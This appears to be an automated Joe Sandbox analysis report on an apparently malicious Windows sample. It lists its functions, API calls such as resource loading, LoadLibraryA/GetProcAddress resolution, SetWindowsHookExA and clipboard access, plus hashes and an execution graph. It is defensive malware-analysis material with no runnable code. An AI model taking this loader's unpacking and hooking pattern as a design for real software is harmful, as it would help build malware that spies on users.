                                                                                              • Instruction ID: 9c0c071fa77b30ee2c4d0de46a24b2bffb9b5af77ecd2fe8e38113c4566a6c2a
                                                                                              • Opcode Fuzzy Hash: 19d051e35025ac9efe6da69b96030b0128dae1921998d4a1a8e6a5c68a141ade
                                                                                              • Instruction Fuzzy Hash: A5411D74A1039C9BDB21EB68DC84BDAB7FCAF2C200F4440E9A548EB245D7749F948F94
                                                                                              Function 031C1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6307ee7bebd612fe02839c2aee0327e121b4aa99b8254591bdcc55d2b8492c07
                                                                                              • Instruction ID: 78741f44fc084d9953456c98ccf8394abf75bd5bbe0a59c320ca7fa56b3d574b
                                                                                              • Opcode Fuzzy Hash: 6307ee7bebd612fe02839c2aee0327e121b4aa99b8254591bdcc55d2b8492c07
                                                                                              • Instruction Fuzzy Hash: 8FA12A6A7B07802BD719EA7C9C943BDB3C19BEC221F1C427EE115CB387DB64C9558240
                                                                                              Function 031C94EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,031C95DA), ref: 031C9572
                                                                                              • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,031C95DA), ref: 031C9578
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: DateFormatLocaleThread
                                                                                              • String ID: yyyy
                                                                                              • API String ID: 3303714858-3145165042
                                                                                              • Opcode ID: 86ee03b40dbe80eea66008a8d75616458c41e3c06d25822751eb228f025f3594
                                                                                              • Instruction ID: 7abb9fb90d6b00a26aaf70e8e5255cde4cf629833601e295746017b6f5901b53
                                                                                              • Opcode Fuzzy Hash: 86ee03b40dbe80eea66008a8d75616458c41e3c06d25822751eb228f025f3594
                                                                                              • Instruction Fuzzy Hash: 49219575A242989FCB11DFA5C991AEEB3B8EF1D700F5500AEE805EB241DB30DE40CB65
                                                                                              Function 031D8338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,031D83C2), ref: 031D83A4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                              • String ID: FlushInstructionCache$Kernel32
                                                                                              • API String ID: 3811539418-184458249
                                                                                              • Opcode ID: 1e28e7b9384fd85676e09bbbc51ccfa62977cf80042343b07f4c7e9ae62f293d
                                                                                              • Instruction ID: 8e50328d216a961525fc3dd86171dcc3fe77241c468ad7d5433f9bd7066d6b26
                                                                                              • Opcode Fuzzy Hash: 1e28e7b9384fd85676e09bbbc51ccfa62977cf80042343b07f4c7e9ae62f293d
                                                                                              • Instruction Fuzzy Hash: 91016D79214348BFDB01EFA9EC51F9E7BACE74EA00F518060B918DA640DB70ED008625
                                                                                              Function 031DAF24 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 031DAF58
                                                                                              • IsBadWritePtr.KERNEL32(?,00000004), ref: 031DAF88
                                                                                              • IsBadReadPtr.KERNEL32(?,00000008), ref: 031DAFA7
                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 031DAFB3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Read$Write
                                                                                              • String ID:
                                                                                              • API String ID: 3448952669-0
                                                                                              • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                              • Instruction ID: 77b025439c8a45173ca5e82249450474a13ad6a97929debc2d59175f8711268e
                                                                                              • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                              • Instruction Fuzzy Hash: B921B4B1A40719ABDB10DF69CC80BAE73A9EF59311F044591FD149B384D734E81187A0

                                                                                              Execution Graph

                                                                                              Execution Coverage:11.2%
                                                                                              Dynamic/Decrypted Code Coverage:55.4%
                                                                                              Signature Coverage:10.7%
                                                                                              Total number of Nodes:401
                                                                                              Total number of Limit Nodes:44
                                                                                              execution_graph 59184 2db85858 DuplicateHandle 59185 2db858ee 59184->59185 59186 2db8bf5e 59187 2db8bf6a 59186->59187 59188 2db8c238 59187->59188 59190 2db8ad88 59187->59190 59192 2db8ada9 59190->59192 59191 2db8adcd 59191->59188 59192->59191 59195 2db8af38 59192->59195 59199 2db8af28 59192->59199 59198 2db8af45 59195->59198 59196 2db8af7e 59196->59191 59198->59196 59203 2db89b64 59198->59203 59200 2db8af38 59199->59200 59201 2db8af7e 59200->59201 59202 2db89b64 4 API calls 59200->59202 59201->59191 59202->59201 59204 2db89b6f 59203->59204 59206 2db8aff0 59204->59206 59207 2db89b98 59204->59207 59206->59206 59208 2db89ba3 59207->59208 59212 2db8fb68 59208->59212 59220 2db8fb80 59208->59220 59209 2db8b499 59209->59206 59213 2db8fb73 59212->59213 59215 2db8fad9 59212->59215 59213->59215 59229 2db8fdf8 59213->59229 59233 2db8fde8 59213->59233 59214 2db8fbfd 59239 2db80418 59214->59239 59243 2db80403 59214->59243 59215->59209 59222 2db8fbb1 59220->59222 59224 2db8fcb1 59220->59224 59221 2db8fbbd 59221->59209 59222->59221 59227 2db8fdf8 2 API calls 59222->59227 59228 2db8fde8 2 API calls 59222->59228 59223 2db8fbfd 59225 2db80418 2 API calls 59223->59225 59226 2db80403 2 API calls 59223->59226 59224->59209 59225->59224 59226->59224 59227->59223 59228->59223 59247 2dec043b 59229->59247 59255 2dec0448 59229->59255 59230 2db8fe02 59230->59214 59234 2db8fdcf 59233->59234 59235 2db8fdf7 59233->59235 59234->59214 59236 2db8fe02 59235->59236 59237 2dec0448 2 API calls 59235->59237 59238 2dec043b 2 API calls 59235->59238 59236->59214 59237->59236 59238->59236 59240 2db80443 59239->59240 59241 2db804f2 59240->59241 59271 2db818fb 59240->59271 59245 2db80443 59243->59245 59244 2db804f2 59244->59244 59245->59244 59246 2db818fb 2 API calls 59245->59246 59246->59244 59248 2dec0448 59247->59248 59250 2dec0474 59248->59250 59263 2db80e1a 59248->59263 59267 2db80e20 59248->59267 59249 2dec0464 59249->59250 59253 2dec0448 2 API calls 59249->59253 59254 2dec043b 2 API calls 59249->59254 59250->59230 59253->59250 59254->59250 59256 2dec0459 59255->59256 59258 2dec0474 59255->59258 59261 2db80e1a GetModuleHandleW 59256->59261 59262 2db80e20 GetModuleHandleW 59256->59262 59257 2dec0464 59257->59258 59259 2dec0448 2 API calls 59257->59259 59260 2dec043b 2 API calls 59257->59260 59258->59230 59259->59258 59260->59258 59261->59257 59262->59257 59264 2db80e68 GetModuleHandleW 59263->59264 59265 2db80e62 59263->59265 59266 2db80e95 59264->59266 59265->59264 59266->59249 59268 2db80e68 GetModuleHandleW 59267->59268 59269 2db80e62 59267->59269 59270 2db80e95 59268->59270 59269->59268 59270->59249 59275 2db81950 59271->59275 59279 2db81947 59271->59279 59276 2db819b8 CreateWindowExW 59275->59276 59278 2db81a74 59276->59278 59280 2db819b8 CreateWindowExW 59279->59280 59282 2db81a74 59280->59282 59283 27f60c10 59286 27f60c19 59283->59286 59287 27f626d6 59283->59287 59290 27f631e3 59283->59290 59293 27f69340 59287->59293 59292 27f69340 VirtualProtect 59290->59292 59291 27f631ff 59292->59291 59295 27f69353 59293->59295 59297 27f693f0 59295->59297 59298 27f69438 VirtualProtect 59297->59298 59300 27f626ec 59298->59300 59152 2db87430 59153 2db8748a OleGetClipboard 59152->59153 59154 2db874ca 59153->59154 59301 2db85610 59302 2db85656 GetCurrentProcess 59301->59302 59304 2db856a8 GetCurrentThread 59302->59304 59305 2db856a1 59302->59305 59306 2db856de 59304->59306 59307 2db856e5 GetCurrentProcess 59304->59307 59305->59304 59306->59307 59310 2db8571b 59307->59310 59308 2db85743 GetCurrentThreadId 59309 2db85774 59308->59309 59310->59308 59311 27dbd030 59312 27dbd048 59311->59312 59313 27dbd0a2 59312->59313 59318 2db81b08 59312->59318 59323 2db86450 59312->59323 59335 2db86460 59312->59335 59347 2db81af8 59312->59347 59319 2db81b2e 59318->59319 59321 2db86460 3 API calls 59319->59321 59322 2db86450 3 API calls 59319->59322 59320 2db81b4f 59320->59313 59321->59320 59322->59320 59324 2db86455 59323->59324 59325 2db864c1 59324->59325 59327 2db864b1 59324->59327 59385 2db8541c 59325->59385 59352 2db865e8 59327->59352 59356 2db865d8 59327->59356 59360 2dec0cc4 59327->59360 59366 2dec0beb 59327->59366 59372 2dec0bf8 59327->59372 59377 2dec0c9f 59327->59377 59328 2db864bf 59338 2db8648d 59335->59338 59336 2db864c1 59337 2db8541c CallWindowProcW 59336->59337 59340 2db864bf 59337->59340 59338->59336 59339 2db864b1 59338->59339 59341 2db865e8 CallWindowProcW 59339->59341 59342 2db865d8 CallWindowProcW 59339->59342 59343 2dec0c9f 3 API calls 59339->59343 59344 2dec0bf8 3 API calls 59339->59344 59345 2dec0beb 3 API calls 59339->59345 59346 2dec0cc4 3 API calls 59339->59346 59341->59340 59342->59340 59343->59340 59344->59340 59345->59340 59346->59340 59348 2db81b2e 59347->59348 59350 2db86460 3 API calls 59348->59350 59351 2db86450 3 API calls 59348->59351 59349 2db81b4f 59349->59313 59350->59349 59351->59349 59353 2db865eb 59352->59353 59354 2db8541c CallWindowProcW 59353->59354 59355 2db866ce 59353->59355 59354->59353 59355->59328 59357 2db865e2 59356->59357 59358 2db8541c CallWindowProcW 59357->59358 59359 2db866ce 59357->59359 59358->59357 59359->59328 59361 2dec0cd2 59360->59361 59362 2dec0c82 59360->59362 59364 2dec0c9f 3 API calls 59362->59364 59389 2dec0cb0 59362->59389 59363 2dec0c98 59363->59328 59364->59363 59367 2dec0bcc 59366->59367 59369 2dec0bf3 59366->59369 59367->59328 59368 2dec0c98 59368->59328 59370 2dec0c9f 3 API calls 59369->59370 59371 2dec0cb0 3 API calls 59369->59371 59370->59368 59371->59368 59373 2dec0c0c 59372->59373 59375 2dec0c9f 3 API calls 59373->59375 59376 2dec0cb0 3 API calls 59373->59376 59374 2dec0c98 59374->59328 59375->59374 59376->59374 59378 2dec0c7c 59377->59378 59379 2dec0ca3 59377->59379 59383 2dec0c9f 3 API calls 59378->59383 59384 2dec0cb0 3 API calls 59378->59384 59380 2dec0cc1 59379->59380 59382 2dec1e7b 3 API calls 59379->59382 59380->59328 59381 2dec0c98 59381->59328 59382->59380 59383->59381 59384->59381 59386 2db85427 59385->59386 59387 2db86782 CallWindowProcW 59386->59387 59388 2db86731 59386->59388 59387->59388 59388->59328 59390 2dec0cc1 59389->59390 59392 2dec1e7b 59389->59392 59390->59363 59395 2db8541c CallWindowProcW 59392->59395 59397 2db866d8 59392->59397 59401 2db853ef 59392->59401 59393 2dec1e8a 59393->59390 59395->59393 59398 2db866e8 59397->59398 59399 2db86782 CallWindowProcW 59398->59399 59400 2db86731 59398->59400 59399->59400 59400->59393 59402 2db85405 59401->59402 59403 2db86782 CallWindowProcW 59402->59403 59404 2db86731 59402->59404 59403->59404 59404->59393 59155 2d182849 59157 2d182853 59155->59157 59156 2d182909 59157->59156 59160 2d819c20 59157->59160 59164 2d819c1b 59157->59164 59161 2d819c35 59160->59161 59162 2d819e46 59161->59162 59163 2d81a280 GlobalMemoryStatusEx 59161->59163 59162->59156 59163->59161 59165 2d819c20 59164->59165 59166 2d819e46 59165->59166 59167 2d81a280 GlobalMemoryStatusEx 59165->59167 59166->59156 59167->59165 59405 2d81f4b0 59406 2d81f4bd 59405->59406 59408 2d81f53e 59406->59408 59409 2d81f1ec 59406->59409 59410 2d81f1f7 59409->59410 59412 2db80418 2 API calls 59410->59412 59413 2db80403 2 API calls 59410->59413 59411 2d81f767 59411->59408 59412->59411 59413->59411 59414 40cbf7 59415 40cc08 59414->59415 59458 40d534 HeapCreate 59415->59458 59418 40cc46 59519 41087e 71 API calls 8 library calls 59418->59519 59421 40cc4c 59422 40cc50 59421->59422 59423 40cc58 __RTC_Initialize 59421->59423 59520 40cbb4 62 API calls 3 library calls 59422->59520 59460 411a15 67 API calls 2 library calls 59423->59460 59425 40cc57 59425->59423 59427 40cc66 59428 40cc72 GetCommandLineA 59427->59428 59429 40cc6a 59427->59429 59461 412892 71 API calls 3 library calls 59428->59461 59521 40e79a 62 API calls 3 library calls 59429->59521 59432 40cc71 59432->59428 59433 40cc82 59522 4127d7 107 API calls 3 library calls 59433->59522 59435 40cc8c 59436 40cc90 59435->59436 59437 40cc98 59435->59437 59523 40e79a 62 API calls 3 library calls 59436->59523 59462 41255f 106 API calls 6 library calls 59437->59462 59440 40cc97 59440->59437 59441 40cc9d 59442 40cca1 59441->59442 59443 40cca9 59441->59443 59524 40e79a 62 API calls 3 library calls 59442->59524 59463 40e859 73 API calls 5 library calls 59443->59463 59446 40cca8 59446->59443 59447 40ccb0 59448 40ccb5 59447->59448 59449 40ccbc 59447->59449 59525 40e79a 62 API calls 3 library calls 59448->59525 59464 4019f0 OleInitialize 59449->59464 59452 40ccbb 59452->59449 59453 40ccd8 59454 40ccea 59453->59454 59526 40ea0a 62 API calls _doexit 59453->59526 59527 40ea36 62 API calls _doexit 59454->59527 59457 40ccef __ioinit 59459 40cc3a 59458->59459 59459->59418 59518 40cbb4 62 API calls 3 library calls 59459->59518 59460->59427 59461->59433 59462->59441 59463->59447 59465 401ab9 59464->59465 59528 40b99e 59465->59528 59467 401abf 59468 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 59467->59468 59497 402467 59467->59497 59469 401dc3 CloseHandle GetModuleHandleA 59468->59469 59477 401c55 59468->59477 59541 401650 59469->59541 59471 401e8b FindResourceA LoadResource LockResource SizeofResource 59543 40b84d 59471->59543 59475 401c9c CloseHandle 59475->59453 59476 401ecb _memset 59478 401efc SizeofResource 59476->59478 59477->59475 59481 401cf9 Module32Next 59477->59481 59479 401f1c 59478->59479 59480 401f5f 59478->59480 59479->59480 59599 401560 __VEC_memcpy __fptostr 59479->59599 59483 401f92 _memset 59480->59483 59600 401560 __VEC_memcpy __fptostr 59480->59600 59481->59469 59490 401d0f 59481->59490 59485 401fa2 FreeResource 59483->59485 59486 40b84d _malloc 62 API calls 59485->59486 59487 401fbb SizeofResource 59486->59487 59488 401fe5 _memset 59487->59488 59489 4020aa LoadLibraryA 59488->59489 59491 401650 59489->59491 59490->59475 59493 401dad Module32Next 59490->59493 59492 40216c GetProcAddress 59491->59492 59494 4021aa 59492->59494 59492->59497 59493->59469 59493->59490 59494->59497 59573 4018f0 59494->59573 59497->59453 59498 4021f1 59516 40243f 59498->59516 59585 401870 59498->59585 59500 402269 VariantInit 59501 401870 75 API calls 59500->59501 59502 40228b VariantInit 59501->59502 59503 4022a7 59502->59503 59504 4022d9 SafeArrayCreate SafeArrayAccessData 59503->59504 59590 40b350 59504->59590 59507 40232c 59508 402354 SafeArrayDestroy 59507->59508 59517 40235b 59507->59517 59508->59517 59509 402392 SafeArrayCreateVector 59510 4023a4 59509->59510 59511 4023bc VariantClear VariantClear 59510->59511 59592 4019a0 59511->59592 59514 40242e 59515 4019a0 65 API calls 59514->59515 59515->59516 59516->59497 59601 40b6b5 62 API calls 2 library calls 59516->59601 59517->59509 59518->59418 59519->59421 59520->59425 59521->59432 59522->59435 59523->59440 59524->59446 59525->59452 59526->59454 59527->59457 59531 40b9aa __ioinit _strnlen 59528->59531 59529 40b9b8 59602 40bfc1 62 API calls __getptd_noexit 59529->59602 59531->59529 59534 40b9ec 59531->59534 59532 40b9bd 59603 40e744 6 API calls 2 library calls 59532->59603 59604 40d6e0 62 API calls 2 library calls 59534->59604 59536 40b9cd __ioinit 59536->59467 59537 40b9f3 59605 40b917 120 API calls 3 library calls 59537->59605 59539 40b9ff 59606 40ba18 LeaveCriticalSection _doexit 59539->59606 59542 4017cc _realloc 59541->59542 59542->59471 59544 40b900 59543->59544 59553 40b85f 59543->59553 59614 40d2e3 6 API calls __decode_pointer 59544->59614 59546 40b906 59615 40bfc1 62 API calls __getptd_noexit 59546->59615 59551 40b8bc RtlAllocateHeap 59551->59553 59552 40b870 59552->59553 59607 40ec4d 62 API calls 2 library calls 59552->59607 59608 40eaa2 62 API calls 7 library calls 59552->59608 59609 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 59552->59609 59553->59551 59553->59552 59555 40b8ec 59553->59555 59558 40b8f1 59553->59558 59560 401ebf 59553->59560 59610 40b7fe 62 API calls 4 library calls 59553->59610 59611 40d2e3 6 API calls __decode_pointer 59553->59611 59612 40bfc1 62 API calls __getptd_noexit 59555->59612 59613 40bfc1 62 API calls __getptd_noexit 59558->59613 59561 40af66 59560->59561 59563 40af70 59561->59563 59562 40b84d _malloc 62 API calls 59562->59563 59563->59562 59564 40af8a 59563->59564 59568 40af8c std::bad_alloc::bad_alloc 59563->59568 59616 40d2e3 6 API calls __decode_pointer 59563->59616 59564->59476 59566 40afb2 59618 40af49 62 API calls std::exception::exception 59566->59618 59568->59566 59617 40d2bd 73 API calls __cinit 59568->59617 59569 40afbc 59619 40cd39 RaiseException 59569->59619 59572 40afca 59574 401903 lstrlenA 59573->59574 59575 4018fc 59573->59575 59620 4017e0 59574->59620 59575->59498 59578 401940 GetLastError 59580 40194b MultiByteToWideChar 59578->59580 59581 40198d 59578->59581 59579 401996 59579->59498 59582 4017e0 77 API calls 59580->59582 59581->59579 59636 401030 GetLastError EntryPoint 59581->59636 59583 401970 MultiByteToWideChar 59582->59583 59583->59581 59586 40af66 74 API calls 59585->59586 59587 40187c 59586->59587 59588 401885 SysAllocString 59587->59588 59589 4018a4 59587->59589 59588->59589 59589->59500 59591 40231a SafeArrayUnaccessData 59590->59591 59591->59507 59593 4019aa InterlockedDecrement 59592->59593 59598 4019df VariantClear 59592->59598 59594 4019b8 59593->59594 59593->59598 59595 4019c2 SysFreeString 59594->59595 59597 4019c9 59594->59597 59594->59598 59595->59597 59640 40aec0 63 API calls 2 library calls 59597->59640 59598->59514 59599->59479 59600->59483 59601->59497 59602->59532 59604->59537 59605->59539 59606->59536 59607->59552 59608->59552 59610->59553 59611->59553 59612->59558 59613->59560 59614->59546 59615->59560 59616->59563 59617->59566 59618->59569 59619->59572 59621 4017f3 59620->59621 59622 4017e9 EntryPoint 59620->59622 59623 401805 59621->59623 59624 4017fb EntryPoint 59621->59624 59622->59621 59625 401818 59623->59625 59626 40180e EntryPoint 59623->59626 59624->59623 59627 40183e 59625->59627 59631 401844 59625->59631 59637 40b783 72 API calls 4 library calls 59625->59637 59626->59625 59638 40b6b5 62 API calls 2 library calls 59627->59638 59633 40186d MultiByteToWideChar 59631->59633 59634 40184e EntryPoint 59631->59634 59639 40b743 62 API calls 2 library calls 59631->59639 59632 40182d 59632->59631 59635 401834 EntryPoint 59632->59635 59633->59578 59633->59579 59634->59631 59635->59627 59637->59632 59638->59631 59639->59631 59640->59598 59168 2db869e0 59169 2db869e8 59168->59169 59171 2db86a0b 59169->59171 59172 2db85474 59169->59172 59173 2db86a20 KiUserCallbackDispatcher 59172->59173 59175 2db86a8e 59173->59175 59175->59169 59176 2d182240 59177 2d182286 DeleteFileW 59176->59177 59179 2d1822bf 59177->59179 59180 2db88e20 59182 2db88e64 SetWindowsHookExA 59180->59182 59183 2db88eaa 59182->59183 59641 27f695c8 59642 27f69608 CloseHandle 59641->59642 59644 27f69639 59642->59644 59645 27f69848 59646 27f6984e 59645->59646 59647 27f6991b 59646->59647 59650 2db89680 59646->59650 59654 2db89670 59646->59654 59651 2db8968f 59650->59651 59658 2db88004 59651->59658 59655 2db89680 59654->59655 59656 2db88004 4 API calls 59655->59656 59657 2db896af 59656->59657 59657->59646 59660 2db8800f 59658->59660 59662 2db880ac 59660->59662 59661 2db89775 59661->59661 59663 2db880b7 59662->59663 59664 2db89dc9 59663->59664 59665 2db8ad88 4 API calls 59663->59665 59664->59661 59665->59664

                                                                                              Executed Functions

                                                                                              Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 18 401c98-401c9a 16->18 20 401c7d-401c83 17->20 21 401c8f-401c91 17->21 22 401cb0-401cce call 401650 18->22 23 401c9c-401caf CloseHandle 18->23 20->16 25 401c85-401c8d 20->25 21->18 33 401cd0-401cd4 22->33 25->14 25->21 29 401ef3-401f1a call 401300 SizeofResource 27->29 28->29 38 401f1c-401f2f 29->38 39 401f5f-401f69 29->39 36 401cf0-401cf2 33->36 37 401cd6-401cd8 33->37 42 401cf5-401cf7 36->42 40 401cda-401ce0 37->40 41 401cec-401cee 37->41 43 401f33-401f5d call 401560 38->43 44 401f73-401f75 39->44 45 401f6b-401f72 39->45 40->36 46 401ce2-401cea 40->46 41->42 42->23 47 401cf9-401d09 Module32Next 42->47 43->39 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 44->49 50 401f77-401f8d call 401560 44->50 45->44 46->33 46->41 47->7 51 401d0f 47->51 49->5 87 4021aa-4021c0 49->87 50->49 52 401d10-401d2e call 401650 51->52 61 401d30-401d34 52->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 68 401d55-401d57 63->68 66 401d3a-401d40 64->66 67 401d4c-401d4e 64->67 66->63 70 401d42-401d4a 66->70 67->68 68->23 71 401d5d-401d7b call 401650 68->71 70->61 70->67 77 401d80-401d84 71->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 81 401da5-401da7 79->81 83 401d8a-401d90 80->83 84 401d9c-401d9e 80->84 81->23 86 401dad-401dbd Module32Next 81->86 83->79 85 401d92-401d9a 83->85 84->81 85->77 85->84 86->7 86->52 89 4021c6-4021ca 87->89 90 40246a-402470 87->90 89->90 93 4021d0-402217 call 4018f0 89->93 91 402472-402475 90->91 92 40247a-402480 90->92 91->92 92->5 94 402482-402487 92->94 98 40221d-40223d 93->98 99 40244f-40245f 93->99 94->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 103->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 152 40234e call 27dad01d 122->152 153 40234e call 27dad005 122->153 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 154 402390 call 27dad01d 135->154 155 402390 call 27dad005 135->155 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 141 4023b6-4023b8 140->141 142 4023ba 140->142 144 4023bc-402417 VariantClear * 2 call 4019a0 141->144 142->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->127 153->127 154->138 155->138
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                              • _getenv.LIBCMT ref: 00401ABA
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                              • Module32First.KERNEL32 ref: 00401C48
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                              • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                              • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                              • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                              • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                              • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                              • _malloc.LIBCMT ref: 00401EBA
                                                                                              • _memset.LIBCMT ref: 00401EDD
                                                                                              • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1859312320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
